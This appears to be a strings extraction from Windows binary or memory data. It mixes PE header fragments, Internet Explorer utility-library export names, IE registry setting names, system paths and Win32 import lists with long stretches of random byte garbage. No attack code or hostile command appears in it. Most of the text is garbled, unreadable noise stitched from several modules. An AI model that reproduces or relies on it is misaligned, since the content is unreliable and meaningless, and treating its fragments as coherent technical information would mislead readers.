Bv[vBv[HZv= ;vjHZv 3\v= ;vY Fv >vh Fv d\v= d\v5d\vUd\vv 1`v= ;vn6`v 7`vy1`v 1`vv Y`vn_`v ;vyn`vpl`v+c`v f`v= u`vAd`v u`v%n`v avDIav= ]dv= ;v%bdv9]dvhyjv= xjvt ;vjHZv ;vku3v/ evUS;v#tev evO[2v Bv_V;v ;vku3v/ evUS;v#tev evO[2v Bv_V;v2 Uvku3v/ evUS;v#tev evO[2v Bv_V;v ?vF[\v _v1C=v _^[] I;vW [_^] Uv1C=v2 tevs uev} _vqS;v 2v9{D [_^] tevU uevm _vmU;v t ;M lv|hlvmvp}>v a\v G9vj %Lv_ w:v1 >v1WWv >vOWWv BvmWWv 95v$QGv `vY48vt ;vQ38v ,7v9 ;v]B8v ,7vV 78v= ;v|38vy&8v 78v) ;vQ38vu48v Mvj _^[] G9vS G9vj G9vVxlv ;vexlvlulv 5vtxlv. ;vexlvp %Lv. kv 8v Lvj( dvu[dvH6dv 8gvs8gv w:vq0;v G9vI c2vTz2v NGv]PGv Avb&3vw'3v 'Fv9;Fv Av=_2v ldv/Xjv Av6 mv -Fvx qJvKpUv G9vQx[v x[v=y[v xSv9 Lv1k[v Zvg Zv w:v2 Uv>fcv ecvxfev) w:v\LFvnsGv lBv, /Hvj sJv2 EBvh EAvH 3Kv)3Kv EBvVkLv1FBvUBAv'^mv/]mvD]mv @vwGAv vt9>v 9>vt9>v ;lv_;lv[ 9>vt9>v ;lv_;lv[ ^vwpLvW Zv4 Zv vC v=CBv }]vm~]v x]vlx]v LvU7Iv Iv@EIvEIIv .`vX+`v .`vvC jvuH5v $av avt!av !avH"av JvJ#av $avX avVO5v 8v~&Bv %avy X@vF Jv vH ]FvI _Jv;eJv%dJv= lv}yEv4 JvYgJv%oJvU >vlkJv nJvAoJvI lv!hJvA ;>vx5lv 6lvF >v}:>v K>vl6lvl6lv 4lv_4lv v ;>vx5lv ">vX >v}:>v K>vl6lvl6lva4>v >vZ%>v >>vM<>v ;>vx5lv ">vEJ>vF >v}:>v K>vl6lvl6lva4>v >vZ%>v y|\vY48v!~\v) w:v1k[vNVAv Gv#@Jv Hv=CBv=CBv w:vD%Xv VJvj F 9ivQ4Jv 8iv{8iv ,R88 'YSYn 4.%D ^}nK ^.x` %t9u@ 0%D[$ %>Eb \s~G zWaH oKga F/LL [[O0 } lZA UWoJ q7#k G"za k2z? 5"tu Si?YS _qGr DEST T&K "=vj "=vj "=vj :qq;\C yIvj hp#=v `9vP #=vQh #=vQ QAvj hT$=v ;=v] v #=vHkkv v vd5>v H=vE I=v3 mI=v dI=v hhL=v 4L=v h|K=vW t$9} VWh SVW3 2vj/ xoW3 QPh\ tI<;tE<[ ;vPW Ph|K=v *N]v 2evW2ev 2evafAv 1evYgIv )3vH N]v2 Uvw\^v "WvI dIv2 ;vw\^vq 2evW2ev 2evafAv 1evYgIv )3vH 7vV8ev @eve3ev Aev'Aev 8evrAev 4evR3evw\^v "WvI 9evF8ev ;vU9evq dIvf5ev AevIBev\3ev ;vw\^vq 2evW2ev 2evafAv 1evYgIv )3vH IvVN]v {Av6 Y]vSQ]vy IvgR]v #Hv.#HvW#Hv +5vSe3v Jvqe3v|3Hv O]v2 Lvm|Av ;v!P]v v\ >vn Tvw\^v 9v"Civ 2vW3 N$XA "txgm~n :v9^f; u PS 8 2v < 2v 8 2v; nvtr < 2v < 2v9 < 2v WWWWWWW 8 2v 5P 2vj2 .com .bat .cmd .pif .lnk .ico WWWWWWWWS /:vSW q4Ph 8Evh< 9:vh< PShp RVh$.9v RWVP PVVV 2vPh h%AEv 0Rv3 WhdA8vh$27vP SRPV VhdA8v hp` 9}(u 9;u% 2vPW jGWWWWW u j@h, H 2vP 2v3 SPhp PSjNS ovhaIVvSS nv9E >5vj >5vV VWhP 2vPS Phe$ Ph$.9vVS Vj@j N8vV tFvQ 7vPPW 9S(ud9St [3v3 ,`6v3 SSSP PSSj Qh@J>t6; SSSV Shh-2v 8>tY3 8vEGRv FRv3 SSSh 9v_] x!2v 1f;2u QQSV 9_vW ;vu48v M9} t"2v p"2v3 H 2vP 2vVW H 2vP t"2v p"2v hHVv kKVv E j' RVvh PhPGWj 2v_^[ QWWj t\9} 2v@)E t'9E PVWt \"2v ,"2v3 tG9M |39E t'9E SSSS ("2v 04vj Vh004v RVVj h 04vP PVVh PVVh PVVh<$:v PVVh /7v PVVh PSSSS 2vj/ $"2v _^[] |.WS RWWP fGvj RhpMGvP ;vVP PhPGq2v $(mv' =v.(mv 8(mvF M(mvW(mvl(mv k)mva)mvW)mvu)mv\+KvM)mvC)mv_}4v uf+Kv B2vtO>v.)mv1 >v$)mv (mv] l4vao )mv^ )mv*m4v (mv m4v 4vtl (mvR+Kv )mv# *mv" Bv3*mv=*mv *mv)*mv )mvp CvMI7v )mvx57v )mv(G ~O>vG*mv Dv\*mv ^>v$b>v X\>vN\>v +mvc 3vm\>v] *mvI 2v.+mv ?vC+mvS *mv4 *mvq*mv E^?v {+mvX+mv ]^?v i>vV +mvx ,mvf Kv$,mv ,mvn +mvz .,mvC,mv\ X,mv @vu`mv* @v2pDv @vk`mva`mv] KvL`mv7`mvvHAv-`mv @v#`mv `mvE _mv||Dvf Dv(pDvr|Dvh|Dv VDv^|DvT|Dv VDvp amv{_mvf_mvQ_mv<_mv VDv'_mvp VDvf VDvJ|Dv ^mv\ VDvxVDvS Dv@|Dv }Dv6|Dv ?DvI DvVO>v ^mvLO>v5 ^mv! ^mvw^mvb^mvM^mv8^mv O>vH >v,|Dv Kv]?Dv \mv1 Dvg?DvR \mvq?Dv ]mv{?Dv >vfkLv DvBO>v\kLvf @vvJ]mv >v_]mvt]mvY ]mvc ?Dv; I>vc >v"|Dv ?DvpkLv ]mvR qmv&rmv ^?v0rmv:rmvDrmv \k?v4 _rmv @v2x@v smvWI7v smv( smvZ Av-^?v tmvI97v smv{ smvusmvksmvasmvWsmvMsmvCsmv Dv6J>v,J>v 2vlmDv9smv"J>v/smv 4v8UEv[d4v%smv O>vKnDv Iv#^?v 3vvmDv.$Ev smv> rmved4vM>3v rmvWG4v BvkG4v >Dv>37v >Dv8 4vaG4vv rmvz <7v, DvwtMt >Dv\nMt tmv 7^?v mvu^?v>^?v @vs}4vi}4v .?AVlength_error@std@@ .?AVbad_alloc@std@@ (%Rvp .?AVlogic_error@std@@ pev@%Rv .?AVout_of_range@std@@ .?AVexception@@ vtn7v o7v n7v Fvtp7v FvLn7v o7v n7v e9v 2;v n7v n7v o7v 6v045v Gv\35v 35vx65v 35vp85v Kv L5Kv $Rv&u G5v u Windows Shell true !This program cannot be run in DOS mode. Rich .text `.wpp_sf `.data .idata @.didat .tls .rsrc @.reloc Y__^[ j0hh< iertutil.dll CreateIUriBuilder CreateStringHashN CreateUri CreateUriFromMultiByteString CreateUriPriv CreateUriWithFragment DllCanUnloadNow DllGetActivationFactory DllGetClassObject FastMimeGetFileExtension FastMimeGetIsMimeFilterEnabled FastMimeLookupKnownType FastMimeSetIsMimeFilterEnabled GetIDNSettingsForIE GetIUriPriv GetIUriPriv2 GetPortFromUrlScheme GetPropertyFromName GetPropertyName IEDllLoader IEGetFrameUtilExports IEGetProcessModule IEGetTabWindowExports IERT_DelayLoadFailureHook IUriBuilderInternalCreateDomain ImpersonateUser IntlPercentEncodeNormalize IsDWORDProperty IsStringProperty LCIECalculatePackedStringSize LCIEPackString LCIEUnpackString PrivateCoInternetCanonicalizeIUri PrivateCoInternetCombineIUri PrivateCoInternetParseIUri ResetIDNLanguageData ResetIEExtensibility ResetIERegistrySettings RevertImpersonate UriFromHostAndScheme IsImmersiveProcess PathCreateFromUrlW ^[_] [)Pyk5I T$L; D$ = D$$3 #G0@ <$wb "3nV .) \ ($A1 y@MH bqpT /m,& %E'u D$XQP _^[] SVWjD C0uSF Sh\S L_^] H_^] T$L; http https file 9D$ V4 V,^] t>W3 wVWP SVWj vh@x PVVh PSSh gt\u ;=2en, NP.G Wg7g 6ygG >HYM 4~G 9sZMV ]OAsY Y:3A: 20BJ dqgC !{$K o W/I UD[i "k/7~ #RQ1 f5PK (+?' hI$# eBF) \6$I KlpS VyUB ul~O (B$j (ai> OV[J +9Fd +^ ?~8 FYa[ [bE /:L0L gX-Y 'J,|' #+Z\ *8v5E :$~% i1}M f1uL uIrG O)m&\EzJ OMB )*wE 7*%@ rlNJ cZ^?A` 4>_N 08xk 5YH SMOy #d3M ?KcI mfI< a.DN hX;v hhVo Y@1d^ IpL" c/:V g,XP >S%% Twdq A3D@ 7ZOH H^e @-Eb yA+a Nq3/ 0-,\ rNQ,9 -8m/ ;?H]t IM-Q 8g%? G>V!Bar hLYu $2C: Kc`e &2\D wYW+ C}4 dm?H y4W9Z Uc8J xY`%] o3B H11& 9 Xf Z)4U `ifY @ bhU 2]&M Um>5 pu@IOO 4J5I 3B ]/p+ 3*3a 6' h n,(F <))H mt}Ag .EfG yU]| &cthB8%W g905 RZq5 un}M z^d> ?q\fD{4KI Vh{O I3^A n,Nf 8-'B p5>b ~{D@ `~+i }X4W Y"TI +geC 73g@ jWMuY uP'D^ --3# K,)T0 GKDvBcG O%qU zx9I mO)?c pPO_ 7+BFa %(gs5 <% / p$]3 W'.| +-i4 ^ ($p }J4D JX@z yi&I s[FN r\/I Pi:P 1IqH6 1UnL &&OG ucuC ,#RT# O?_) B$ C GT_ Hck~C ],pt T[4A h,(: 8pM/ "@e j]j- `*0Z #lX*| E`]7__00 >zWD JJX4 _%!z h@ EsQw?^ {{'~ k.?c *H-L UoJ4 ]@%c |>F, t>Ij R+8lz MOhL r/>M Y}kB _#zL }S&O "ya)7 [pGC G6PH D1WE MlO nng; :9fdD 6HI[ `I]2 ED95 PAaA "S\I 1w)E X vH j_2J xC'I Qytz W]/> JmyA ~mjtM ny,* ~& AM ~c=MN $BTd K0~s3 ,H]~Q e`Dk} C}z 7}7/ I|7: y(g| +/u: 73!| {]%zB MGDH zs8QO u=jgOz Fz+} I-zLP z{'fG m%@y :4," 4T=y xerxA et;l l Bhg C-Bj ="8I z$Yw 1V 0 c>w/4 2B vmIlA m8f2G q7JmjH*E Vyxbn {b$_ Cjb[$ ^]zBX& }SA>:67Tav LnS.8a 7o^0a_ U'aK 93_9 R.u-ao Hg`wB%@ _~S C P0OI{_im;J |}b_ _kZcF _HvoI ^GiSJ 2?\^ k.Wj^ eDBbr :T9Q ][A9B `]Pp7D +6]v;c] p>]K =]#X ](.mO }c0" VL} #9Vu7 3Q5U T.&NH StTL StTL StTL StTL StTL StTL StTL StTL StTL StTL StTL StTL 2=VXT@ F{ iT *0Be |>T, .l65& s~S NS@\SC .vSW RaV,D D%iQ +JRJ CRi} 0-^R! |oV9 Le3Q $Qrm UY`\9 PWn6E [/6;` `PD^LO 1Pz4 2qO~ UPQt Z8T6O A=a,O 4G}s '0 CL:/ L,mcL gp/p K=RjH &aS9 ahyK `AKw R:.K 3K?C G&KC <%t$ @q3M 2& Zw;% {I `CHZN#D QUdO$H Gbl#D G_JG H}G69 5_F= EFqk =Z\FZ?>H #QFc= c$pE} BaEB O(;yD D7`+K D;~%A rDsQ ;D'Q VQ(L3 C?i-L fD3C x_UX GFdBc `B=| ywD0 a*&mN ;B$m Y~>|A 4VkE ,A19 RAdO @-9'A ](Z'H !V@1 j@Q&IG |6vD1 @d"JK 11a~ ?.z~ ?[uVB Qo5T CT>_ {F}? Q -gp? F l?Q$ =!='Dsw >wGbA d7p8 '!>Y ={jvB =Z(HC =0fpG w|=@ mP=EO^M v&=tM K>N= <;{~I iI?D ?-7g 1:F< $' h 'A g; ]GI;s =6%F; &1?U OnEO :IMjJ A:f" F,i5& e*2u AZ]O6 KGRp {+KB9 tIV! K94U~N K4&9.q 8!85H ^mbv A86< $&7b8 8i5WG m%`97[uVJ CNUb7w{aN 17zdCJ Hg[3 p)!; .m&V+ 6sZgH 6(-XN c6qO r1IF [A$P qXTli6 M6_>&N I+Q4u]5 AU5R F0d5 ^(5M' R[@5OoiI k_E`} '4~`Pj4 &f@b 8{bu Kr-Q v3@h tS&.HJ|3 4)J3 *+o9h 3&**I o!K? ;5z2 `uDP2 V@a2 +{_2 Jou1 Z1<*JD 2|1F 8|x` vg.u0 cT0f U>:0 F0!6 0`peA ,B;. r/,! (I'F /K(e@ UAr" Tp`?% kP}I ].L/)J P^6c w.0/ C&tA B.c8 M;@< P-2M \-"'dB "3-K \H"= CG-|* %;-;.5M L,+n, ,WL8L ,6==K {, - YDz,( #w,- v,4i YL,= V,GH vMT+ P5,_ +T*=N 0_( HO(K K}(kO r0f( ys_, .s`n'e NWZ_' 8Z-% 'zU`C 'u0aL "! '=; EXMV Mqu&? &v<`C %\JME ]/{y% =O`| ?Y.A%G Q \g >$_= ^{xn1I ;(r#t cJ W[^ >FN#TS D|Ed |$:# nZy*) "Q{kF ;Ru$ "9' M?2! ZF^!W-JM ar!( $BP\ piA!Z ?[`xA+ "(*F WRD n 5*[_ pk_N ]B 2ic c_d0 2yS[ WK1K `2{H ;J(A qryL wzyK ]7#u {W'F +b3Z[ wM@ 3ZU1 %u'N z20L 5lFJ Ir`q QmLJ =hPcI 8poE }b]- lQ&K }iX0 ijsO P>jN c41j xF?N `\#O pq%hVK H2ho ajoF R7KQ 680D r5;N rIeiZ kf;\u l- t WEHM 80&j EEC2_+Z" ghFPT whHe +AgH we~C OdXA S{:?^ =|5K +nJk @wXE (^/\ 6z#E 5#@L la7, g?{H D=2Uk ?zxW2, O!9 gF|C wn"m& mkY/~ SxN4 5$n :\j uM3B9 Y2@ .EWL &;9p` gx1OM ^4=eU 7.T_ o9;6 _; lNQ{ (j]$ T:9Z6 #C*s" 9 BK 139G ;h}4t Z6woL O6{A ku`K 'f"@ `PfY! nWdP 0VtI ^/VtI ^.VtI wh0h D$H3 D$Vf T$P8 L$XQPj t$^3 T$ f9 t$Tj D$43 D$dh D$XPW _^[3 |$,3 |$ j D$dh f9tz wininet.dll {41B23C28-488E-4E5C-ACE2-BB0BBABE99E8} {0633EE93-D776-472f-A0FF-E1416B8B2E3A} Security International XMLHTTP DOMStorage High Medium IEXPLORE.EXE Isolation64Bit Isolation Enable AutoImageResize Show image placeholders Disable Script Debugger Print_Background SmoothScroll Play_Background_Sounds Play_Animations Display Inline Images Anchor Underline MixedContentBlockImages DEPOff DoNotTrack GotoIntranetSiteForSingleWordEntry UseSWRender PlaySounds Enable iexplore.exe Enabled UseMRUSwitching UTF8URLQuery AutoRecover SelectionActivityButtonDisable WebFilters EnabledV8 EnableOnStartup ConsoleBufferAlways FPEnabled Append Completion Use Web Based FTP DisableCachingOfSSLPages EnforceP3PValidity EnablePunycode ShowPunycode ProxyHttp1.1 EnableSPDY3_0 SecureProtocols EnableHttp1_1 UrlEncoding Persistent 270C 2709 270B 2708 2702 2402 2600 2400 2401 2105 2103 2104 2301 120A 120B 1208 1209 2201 2101 2102 2100 2000 1A04 1A00 1809 1806 1804 1802 1803 160A 1608 1609 1606 1607 1604 1601 1409 1406 1407 1402 1405 1400 1201 1206 1004 1200 1001 2300 Enable Browser Extensions NoUpdateCheck Move System Caret UseThemes DisableScriptDebuggerIE Expand Alt Text NotifyDownloadComplete Friendly http errors NscSingleExpand Error Dlg Displayed On Every Error LOCALMACHINE_CD_UNLOCK ResetZoomOnStartup2 ResetTextSizeOnZoom ResetTextSizeOnStartup CheckExeSignatures RunInvalidSignatures CertificateRevocation WarnonZoneCrossing EnableNegotiate %LOCALAPPDATA%\Microsoft\Internet Explorer\AuditMode\VersionAuditLog.CSV #FFCCCC %LOCALAPPDATA%\Microsoft\Internet Explorer\UrlBlockManager\DebugDownload.CSV %LOCALAPPDATA%\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml %LOCALAPPDATA%\Microsoft\Internet Explorer\VersionManager\DebugDownload.CSV %LOCALAPPDATA%\Microsoft\Internet Explorer\UrlBlockManager\urlblocklist.bin %ProgramFiles%\Internet Explorer Platform Preview\iecompatdata.xml %LOCALAPPDATA%\Microsoft\Internet Explorer\VersionManager\versionlist.xml %SystemRoot%\History %SystemRoot%\Downloaded Program Files %SystemRoot%\system32\blank.htm %SystemRoot%\Temporary Internet Files %SystemRoot%\system32\inetcpl.cpl,1321 %SystemRoot%\system32\inetcpl.cpl,1312 %SystemRoot%\system32\inetcpl.cpl,4442 %SystemRoot%\system32\inetcpl.cpl,1323 %SystemRoot%\system32\inetcpl.cpl,4447 %SystemRoot%\system32\inetcpl.cpl,4443 %SystemRoot%\system32\inetcpl.cpl,4485 %SystemRoot%\system32\inetcpl.cpl,4482 %SystemRoot%\system32\inetcpl.cpl,4497 %SystemRoot%\system32\inetcpl.cpl,4486 %USERPROFILE%\Local Settings\Application Data\Microsoft\Feeds Cache %USERPROFILE%\Cookies %USERPROFILE%\Temporary Internet Files\IE\Cache2 %USERPROFILE%\Temporary Internet Files\IE\Cache1 %USERPROFILE%\Temporary Internet Files\IE\Cache4 %USERPROFILE%\Temporary Internet Files\IE\Cache3 .NET Framework %windir%\test /ie11blocklist/1401746408/versionlist.xml .microsoft.com 0,0,0 /ie11blocklist/1401746408/versionlistWin7.xml 128,0,128 0,0,255 3rdParty.html 192,192,192 6.17 7.0.5331.0 65331 7.00.5331.0 @%ProgramFiles%\Internet Explorer\iexplore.exe,-706 @%ProgramFiles%\Internet Explorer\iexplore.exe @%SystemRoot%\system32\inetcpl.cpl,-4732 @%SystemRoot%\system32\inetcpl.cpl,-4731 @%SystemRoot%\system32\inetcpl.cpl,-4734 @%SystemRoot%\system32\inetcpl.cpl,-4733 @%SystemRoot%\system32\inetcpl.cpl,-4737 @%SystemRoot%\system32\inetcpl.cpl,-4735 @%SystemRoot%\system32\inetcpl.cpl,-4741 @%SystemRoot%\system32\inetcpl.cpl,-4739 @%SystemRoot%\system32\inetcpl.cpl,-4743 @%SystemRoot%\system32\inetcpl.cpl,-4742 @%SystemRoot%\system32\inetcpl.cpl,-4745 @%SystemRoot%\system32\inetc? 2Hz, >2@R', 2Hz' <2@R> :Vz/.= 2$ 4 uS .2$ 3(@R$? 4Hr5 qM$35' |Ph :9Oy "qM2#0|j* ?]r$ %]L5 4qM:1 .]L* &]L6 ;:Vz >2@R', 2Hz'# 2@R"8 4Hz4 ?(@R# &9 2Hz7 <(@R2 ? |Ph;%;O |Ph;%;u! )!A{[$91| O-[S^6 hJ|! &]$? hJD>7 !*u! :6!A{[<>?| 0!A{[<> &u' >; (tNh*) hJD!, hJD! O-[S^/ Vvt( |Ph :9O ; @/ 1 9_{B >q;/ O-[S^ 9t /D:\ DOCUME~1 a4{U a4]D durgav U4YX FAVORI~1 Da4LW @shell32.dll,-12693 J4'C Links Da4LW ie-x6401 w6Q9F _^[] _^[] SV3 $SVW QQSV t5;y v_^[ QRPh QRPh QRPh Ss!k x&9] PQQj S`RVW QPQQ QSVW f;DO wtO3 QSVW3 .htm .gif .jpg .png text/html .ico x*;~ QVWh tBSW3 _[^] 5 w@ w D w > wP wPw U w@j L w f w # w w@m w HHtOHuo _^[] f;V, t :F _^[] F`f; f;H, F`f; f;N, wICClose ICGetInfo ICInfo ICInstall ICOpen wGetFileVersionInfoA GetFileVersionInfoByHandle GetFileVersionInfoExW GetFileVersionInfoSizeA GetFileVersionInfoSizeExW GetFileVersionInfoSizeW GetFileVersionInfoW VerQueryValueA VerQueryValueW wAccessibleChildren AccessibleObjectFromEvent AccessibleObjectFromWindowTimeout CreateStdAccessibleObject CreateStdAccessibleProxyW GetProcessHandleFromHwnd GetRoleTextW LresultFromObject ObjectFromLresult PropMgrClient_LookupProp WindowFromAccessibleObject AccessibleObjectFromWindow t/HHt! t!HHt t(V3 97~ F;7| _^[] VVh| tPf; tKf; t,SVWj\_j/ _^[] QQS3 wSh0h SVW3 9=D@ 6Pj@ Yt'= SVW3 VWR3 xYj D$ QQh PQQQ D$ ; _^[3 VWPh WWWj f99t u"S3 9=XN wu$hXN w9=\N wu$h\N w9=`N wu$h`N w9=dN wu$hdN QQSVW SVWj ReleaseSRWLockExclusive AcquireSRWLockExclusive DtBSV _^[f xOVW wPj@ QSVW QSVW Ff;w $SVW3 PSSj VPWP V$^[ G #E _^[] _^[] SVW3 wPj@ F @tg3 [)Pyk5I ;D$T |$H t:99 _^[] \$\u D$HP D$43 D$(; D$43 D$Jf D$Dh \$$F _^[3 wJRS SSPQ WVS3 x@#} ! wj HA%` ! wj QQSVW A`_^ 07 w 8 wj`V Pj`V u#hPh 9 wj : wh SVWj 0; w_ <-tV j-Xf QQSVj `< w < w"< w,< w6< w@< wJ< wT< w VtbS3 [_^] _^[] u:j4h uGVj6h wjaY _^[] M SVW D$@P D$$Pj f91t x0W3 NpPj ;)>_^[ WWWh SVW3 WWWWWWP PWWW Ht=VH Q@Pj @f;C t$(Q PPPPPPh ;D$L D$| >_^] wGetGadgetBitmap AddLayeredRef wBatMeterOnDeviceChange CleanupBatteryData CreateBatteryData GetBatteryImmersiveIcon GetBatteryStatusText QueryBatteryData SetBatteryLevel SubscribeBatteryUpdateNotification UnsubscribeBatteryUpdateNotification UpdateBatteryDataAsync wKccExecuteTask KccGetFailureCache KccInitialize KccUnInitializeTrigger KccUnInitializeWait wHideVAN ShowVAN ShutdownVAN VanUIManager_CreateInstance wSCardConnectW SCardDisconnect SCardEstablishContext SCardFreeMemory SCardGetCardTypeProviderNameW SCardGetStatusChangeW SCardListCardsW SCardListReadersW SCardReleaseContext wDevRtlCloseTextLogSection DevRtlCreateTextLogSectionA DevRtlCreateTextLogSectionW DevRtlGetThreadLogToken DevRtlSetThreadLogToken DevRtlWriteTextLog DevRtlWriteTextLogError wSCardAccessStartedEvent SCardAudit SCardBeginTransaction SCardConnectA SCardEndTransaction SCardGetAttrib SCardGetCardTypeProviderNameA SCardGetDeviceTypeIdA SCardGetDeviceTypeIdW SCardGetReaderDeviceInstanceIdA SCardGetReaderDeviceInstanceIdW SCardGetReaderIconA SCardGetReaderIconW SCardListReadersA SCardListReadersWithDeviceInstanceIdA SCardListReadersWithDeviceInstanceIdW SCardReadCacheW SCardReconnect SCardReleaseStartedEvent SCardSetAttrib SCardStatusA SCardStatusW SCardWriteCacheW SCardCancel L$0j |$4 D$(PV w_^[ Y__^[ QSVW QSVW u=QWV _^[] QQSVW QSVW wVSh QSVW 9Pefs _^[] QRPh wCallNtPowerInformation GetActivePwrScheme GetPwrCapabilities IsPwrHibernateAllowed IsPwrShutdownAllowed IsPwrSuspendAllowed PowerApplySettingChanges PowerDeterminePlatformRole PowerDeterminePlatformRoleEx PowerEnumerate PowerGetActiveScheme PowerInformationWithPrivileges PowerInternalImportP u-PPPP F;7| QQSVW x6W3 SVWjd^3 ;54@ ,SVW f90u D$,P L$l3 _^[] 0Nu D$(PQQ L$(S QQVW _^[f D$4= D$@= D$@= WSPf SVW3 D$0P ;Cdu osWA wGenerateActionQueue ProcessActionQueue wRoCreateNonAgilePropertySet RoGetBufferMarshaler wCheckElevationEnabled wEnableCoreUIIntegration wSHCoCreateInstanceWorker wKerberos wGetFontOverrides MFRR_CreateActivate GetSystemPersistedStorageItemList wNotifyUILanguageChange DiUninstallDevice wWPTextInputClientCreate wMsiSetInternalUI wSetDeviceGammaRamp wMetaDataGetDispenser wEtwLogSysConfigExtension A,tyj L$ QRSPV T$ QQ PSVW PhTk Ph`k Phhk Phxk w97u D$]3 D$$P D$$PWS T$ 3 %u*Q D$$P D$$Ph D$$3 t$(Q f;DO PWQQ QSVW )_^[ VWtX x0S3 ;XHs t:Nt'Nt wRPV SVWj ] VW Ot*Ot OOt#Ot uA!E G,9U f;G* G*C; Hj Y PQQh E$PQ E PQ Pj#hP> Pj6hP> SVWj t.f9 t f9 t/f9 t f9 t'f9 t f9 E,Pj E$Pj VWSj L_^[ E$PQ E Pj up * Service Pack 1 .?AVlogic_error@std@@ .?AVlength_error@std@@ .?AVout_of_range@std@@ .?AVexception@@ .?AVbad_alloc@std@@ Spw' jsw"Vqw nrwj]pw Rqwg qwRBpw Trwn) Vqw3 qwJSrw 5qwe Trwf .qw" qw6nrw Urw/Fqw qwG`pwu wj-qw} Csw}Zpw qwM mw+ qw6]pw v$4"v api-ms-win-downlevel-normaliz-l1-1-0.dll api-ms-win-downlevel-user32-l1-1-0.dll api-ms-win-downlevel-advapi32-l1-1-0.dll api-ms-win-downlevel-version-l1-1-0.dll KERNEL32.dll ntdll.dll msvcrt.dll iswascii iswalpha iswcntrl wcschr ??0exception@@QAE@XZ _wcsicmp isalpha iswalnum iswxdigit _snwprintf_s wcstoul wcsncpy_s memmove_s wcsncmp iswdigit ??0exception@@QAE@ABV0@@Z ??0exception@@QAE@ABQBD@Z ??1exception@@UAE@XZ ?what@exception@@UBEPBDXZ strstr swprintf_s isspace strncmp _strlwr wcsstr bsearch memset wcscspn _vsnwprintf iswpunct wcstod iswspace wcsncat_s memcmp _except_handler4_common __CxxFrameHandler3 _onexit __dllonexit _unlock _lock _initterm _amsg_exit _XcptFilter _itow_s _wtoi _wtoi64 isxdigit realloc wcsnlen strncat wcscpy_s malloc free wcsrchr _wcslwr memmove memcpy_s _CxxThrowException wcstok_s wcstol _wcsnicmp ??1type_info@@UAE@XZ memcpy RtlAllocateHeap NtClose NtCreateFile RtlFreeHeap NtDeviceIoControlFile RtlIpv4StringToAddressExW RtlIpv6StringToAddressExW RtlIpv4AddressToStringExW RtlIpv6AddressToStringExW VerSetConditionMask FindClose VirtualProtect LoadLibraryExA GetSystemInfo GetLocaleInfoEx VerifyScripts GetUserDefaultLocaleName LoadLibraryA IsDBCSLeadByteEx CompareStringOrdinal LocalReAlloc VirtualQuery UnregisterWaitEx GetStringScripts InitializeCriticalSection DeleteCriticalSection EnterCriticalSection LeaveCriticalSection LoadLibraryExW FreeLibrary GetProcAddress GetModuleHandleExW VerifyVersionInfoW CloseHandle GetWindowsDirectoryW GlobalMemoryStatusEx GetCurrentProcessId GetCurrentProcess TlsGetValue TlsSetValue UnmapViewOfFile MapViewOfFileEx GetLastError GetModuleHandleW SetLastError TlsAlloc DisableThreadLibraryCalls InitializeCriticalSectionAndSpinCount ClosePrivateNamespace TlsFree HeapAlloc GetProcessHeap HeapFree GetCurrentThreadId GetTickCount RaiseException GetSystemTimeAsFileTime LocalFree HeapReAlloc lstrlenW lstrlenA OpenProcess CreateFileW LocalAlloc GetCurrentThread GetModuleFileNameW DeleteProcThreadAttributeList UpdateProcThreadAttribute LoadLibraryW InitializeProcThreadAttributeList GetVersionExA OpenEventW WaitForSingleObject IsWow64Process MapViewOfFile CreateFileMappingW OpenFileMappingW CreateMutexW OpenMutexW DuplicateHandle lstrcmpA WideCharToMultiByte CompareStringW MultiByteToWideChar GetEnvironmentVariableW Sleep UnhandledExceptionFilter SetUnhandledExceptionFilter TerminateProcess QueryPerformanceCounter ReleaseMutex FindFirstFileExW TerminateThread RegisterWaitForSingleObject FindNextFileW GetSystemDirectoryW lstrcmpW ExpandEnvironmentStringsW CompareFileTime GetVersionExW TrySubmitThreadpoolCallback InitializeSRWLock AcquireSRWLockExclusive ReleaseSRWLockExclusive AcquireSRWLockShared ReleaseSRWLockShared QueryPerformanceFrequency GlobalAlloc GetStringTypeExW GlobalFree GlobalReAlloc EncodePointer DecodePointer CreateBoundaryDescriptorW AddSIDToBoundaryDescriptor OpenPrivateNamespaceW CreatePrivateNamespaceW DeleteBoundaryDescriptor IsProcessInJob CreateJobObjectW SetInformationJobObject CreateThread CreateEventW ResumeThread SetEvent CreateProcessW UnregisterWait CreateToolhelp32Snapshot Process32FirstW Process32NextW AssignProcessToJobObject VerQueryValueW GetFileVersionInfoExW GetFileVersionInfoSizeExW RegEnumValueW RegDeleteValueW RegQueryInfoKeyW GetSecurityDescriptorDacl SetSecurityDescriptorDacl AddAccessAllowedAceEx DeleteAce GetSidIdentifierAuthority CheckTokenMembership AddAce InitializeSid GetSidLengthRequired FreeSid AddAccessAllowedAce AllocateAndInitializeSid DuplicateTokenEx SetTokenInformation CreateProcessAsUserW RegQueryValueExW CreateRestrictedToken GetAclInformation OpenThreadToken AddMandatoryAce SetSecurityDescriptorSacl GetLengthSid GetSecurityDescriptorSacl IsValidSid InitializeAcl SetKernelObjectSecurity GetAce InitializeSecurityDescriptor EqualSid CopySid GetKernelObjectSecurity GetTokenInformation GetSidSubAuthorityCount GetSidSubAuthority OpenProcessToken RegEnumKeyExW RegOpenKeyExW EventUnregister EventRegister RegSetValueExW RegCloseKey RegCreateKeyExW EventWrite DuplicateToken CreateWellKnownSid TraceMessageVa RegOpenKeyExA RegGetValueW CharLowerW CharLowerA IdnToAscii 7OM6 !This program cannot be run in DOS mode. Rich .text `.data Shared @.rsrc @.reloc Fqwf .qwn) w/Fqw qw%-qw$~pw qwCGqw[GqwPr 8C!w ADVAPI32.dll b!w0c!w0f!w@c!w r w@c!wPc!w c!w@d!w dfltdflt `g"w `"w latndflt `g"w `"w wlatndflt `g"w `"w wcyrldflt `g"w `"w wgrekdflt `g"w `"w warmndflt `g"w `"w wgeordflt `g"w `"w wdfltdflt `g"w `"w wdfltdflt `g"w `"w wkanadflt `g"w `"w whanidflt `g"w `"w wbopodflt `g"w `"w yi dflt `g"w `"w hanidflt `g"w `"w ethidflt `g"w `"w cansdflt `g"w `"w cherdflt `g"w `"w braidflt `g"w `"w runrdflt `g"w `"w ogamdflt `g"w `"w wmongdflt wphagdflt warabdflt '"wpH"w0N"w01"w wsyrcdflt '"wpH"w0N"w01"w whebrdflt `"wp hebrdflt `g"w `"w dfltdflt `g"w `"w wkhmrdflt `"wP sinhdflt `"wP tibtdflt `"wP taledflt thaadflt `"w taludflt `"w0 thaidflt `"w lao dflt `"w latndflt `g"w `"w wmymrdflt `g"w `"w hangKOR dev2dflt `t!w tml2dflt `t!w q!w0 bng2dflt `t!w bng2dflt `g"w 